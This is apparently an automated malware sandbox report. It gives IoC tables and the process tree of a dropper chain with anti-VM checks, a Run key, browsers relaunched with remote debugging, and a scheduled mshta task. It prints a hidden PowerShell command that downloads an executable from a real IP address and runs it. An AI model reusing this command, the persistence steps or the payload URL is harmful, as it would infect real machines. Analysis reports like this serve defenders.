1900	TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
1900	TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
5732	powershell.exe
5732	powershell.exe
5732	powershell.exe
3060	ILqcVeT.exe
3060	ILqcVeT.exe
2584	rXOl0pp.exe
2584	rXOl0pp.exe
5264	rXOl0pp.exe
5264	rXOl0pp.exe
5264	rXOl0pp.exe
5264	rXOl0pp.exe
4732	483d2fa8a0d53818306efeb32d3.exe
4732	483d2fa8a0d53818306efeb32d3.exe
5264	rXOl0pp.exe
5264	rXOl0pp.exe
2076	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs

pid	Process
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe
692	msedge.exe
692	msedge.exe
692	msedge.exe
692	msedge.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
5612	msedge.exe
5612	msedge.exe
5612	msedge.exe
5612	msedge.exe
5736	chrome.exe
5736	chrome.exe
5736	chrome.exe
5736	chrome.exe
5768	msedge.exe
5768	msedge.exe
5768	msedge.exe
5768	msedge.exe
1624	chrome.exe
1624	chrome.exe
1624	chrome.exe
1624	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3256	chrome.exe
Token: SeCreatePagefilePrivilege	3256	chrome.exe
Token: SeShutdownPrivilege	3256	chrome.exe
Token: SeCreatePagefilePrivilege	3256	chrome.exe
Token: SeShutdownPrivilege	3256	chrome.exe
Token: SeCreatePagefilePrivilege	3256	chrome.exe
Token: SeShutdownPrivilege	3256	chrome.exe
Token: SeCreatePagefilePrivilege	3256	chrome.exe
Token: SeShutdownPrivilege	3256	chrome.exe
Token: SeCreatePagefilePrivilege	3256	chrome.exe
Token: SeDebugPrivilege	5592	powershell.exe
Token: SeShutdownPrivilege	3256	chrome.exe
Token: SeCreatePagefilePrivilege	3256	chrome.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	2340	powershell.exe
Token: SeDebugPrivilege	5732	powershell.exe
Token: SeShutdownPrivilege	2076	chrome.exe
Token: SeCreatePagefilePrivilege	2076	chrome.exe
Token: SeShutdownPrivilege	2076	chrome.exe
Token: SeCreatePagefilePrivilege	2076	chrome.exe
Token: SeShutdownPrivilege	2076	chrome.exe
Token: SeCreatePagefilePrivilege	2076	chrome.exe
Token: SeShutdownPrivilege	2076	chrome.exe
Token: SeCreatePagefilePrivilege	2076	chrome.exe
Token: SeShutdownPrivilege	2076	chrome.exe
Token: SeCreatePagefilePrivilege	2076	chrome.exe
Token: SeShutdownPrivilege	2076	chrome.exe
Token: SeCreatePagefilePrivilege	2076	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	5736	chrome.exe
Token: SeCreatePagefilePrivilege	5736	chrome.exe
Token: SeShutdownPrivilege	5736	chrome.exe
Token: SeCreatePagefilePrivilege	5736	chrome.exe
Token: SeShutdownPrivilege	5736	chrome.exe
Token: SeCreatePagefilePrivilege	5736	chrome.exe
Token: SeDebugPrivilege	968	ce4pMzk.exe
Token: SeShutdownPrivilege	5736	chrome.exe
Token: SeCreatePagefilePrivilege	5736	chrome.exe
Token: SeShutdownPrivilege	5736	chrome.exe
Token: SeCreatePagefilePrivilege	5736	chrome.exe
Token: SeShutdownPrivilege	5736	chrome.exe
Token: SeCreatePagefilePrivilege	5736	chrome.exe
Token: SeDebugPrivilege	5408	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	5916	powershell.exe
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	1624	chrome.exe
Token: SeCreatePagefilePrivilege	1624	chrome.exe
Token: SeShutdownPrivilege	1624	chrome.exe
Token: SeCreatePagefilePrivilege	1624	chrome.exe
Token: SeShutdownPrivilege	1624	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
3256	chrome.exe
4944	f903d42ec8.exe
4944	f903d42ec8.exe
4944	f903d42ec8.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
5984	msedge.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe
2076	chrome.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4944	f903d42ec8.exe
4944	f903d42ec8.exe
4944	f903d42ec8.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3092 wrote to memory of 4044	3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe	97
PID 3092 wrote to memory of 4044	3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe	97
PID 3092 wrote to memory of 4044	3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe	97
PID 4044 wrote to memory of 4244	4044	QN45JW4QW9E4TVWGZ5.exe	98
PID 4044 wrote to memory of 4244	4044	QN45JW4QW9E4TVWGZ5.exe	98
PID 4044 wrote to memory of 4244	4044	QN45JW4QW9E4TVWGZ5.exe	98
PID 4244 wrote to memory of 3060	4244	rapes.exe	108
PID 4244 wrote to memory of 3060	4244	rapes.exe	108
PID 4244 wrote to memory of 3060	4244	rapes.exe	108
PID 3060 wrote to memory of 3256	3060	ILqcVeT.exe	110
PID 3060 wrote to memory of 3256	3060	ILqcVeT.exe	110
PID 3256 wrote to memory of 2552	3256	chrome.exe	111
PID 3256 wrote to memory of 2552	3256	chrome.exe	111
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 3508	3256	chrome.exe	112
PID 3256 wrote to memory of 2240	3256	chrome.exe	113
PID 3256 wrote to memory of 2240	3256	chrome.exe	113
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114
PID 3256 wrote to memory of 2444	3256	chrome.exe	114

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3404
- C:\Users\Admin\AppData\Local\Temp\5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
  "C:\Users\Admin\AppData\Local\Temp\5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3092
- - C:\Users\Admin\AppData\Local\Temp\QN45JW4QW9E4TVWGZ5.exe
    "C:\Users\Admin\AppData\Local\Temp\QN45JW4QW9E4TVWGZ5.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4044
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4244
    - - C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3060
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3256
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe1192cc40,0x7ffe1192cc4c,0x7ffe1192cc58
        7⤵
        
        PID:2552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1972,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1968 /prefetch:2
        7⤵
        
        PID:3508
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1752,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2052 /prefetch:3
        7⤵
        
        PID:2240
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2516 /prefetch:8
        7⤵
        
        PID:2444
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4540 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5084
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3644,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
        7⤵
        
        PID:4248
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4692,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4800 /prefetch:8
        7⤵
        
        PID:4984
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4716,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8
        7⤵
        
        PID:5072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4720,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
        7⤵
        
        PID:4320
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5132,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4656 /prefetch:8
        7⤵
        
        PID:3796
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3864,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8
        7⤵
        
        PID:3964
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5152,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5296 /prefetch:8
        7⤵
        
        PID:1936
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5436,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4724 /prefetch:8
        7⤵
        
        PID:5500
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4520,i,1988403315374918283,8609633456533559358,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5320 /prefetch:2
        7⤵
        Uses browser remote debugging
        
        PID:5764
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffe119346f8,0x7ffe11934708,0x7ffe11934718
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:6000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,5590290798372519586,16621990688002357060,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
        7⤵
        
        PID:5128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,5590290798372519586,16621990688002357060,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5192
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,5590290798372519586,16621990688002357060,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
        7⤵
        
        PID:5224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2084,5590290798372519586,16621990688002357060,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2084,5590290798372519586,16621990688002357060,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5440
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2084,5590290798372519586,16621990688002357060,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2084,5590290798372519586,16621990688002357060,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5812
    - - C:\Users\Admin\AppData\Local\Temp\10109460101\f903d42ec8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109460101\f903d42ec8.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4944
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn NfIJcmavGmZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\i8zmeCGDx.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2124
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn NfIJcmavGmZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\i8zmeCGDx.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5208
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\i8zmeCGDx.hta
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:60
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'B4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5592
        
        C:\Users\Admin\AppData\Local\TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
        
        "C:\Users\Admin\AppData\Local\TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1900
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10109470121\am_no.cmd" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5708
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5424
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:340
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
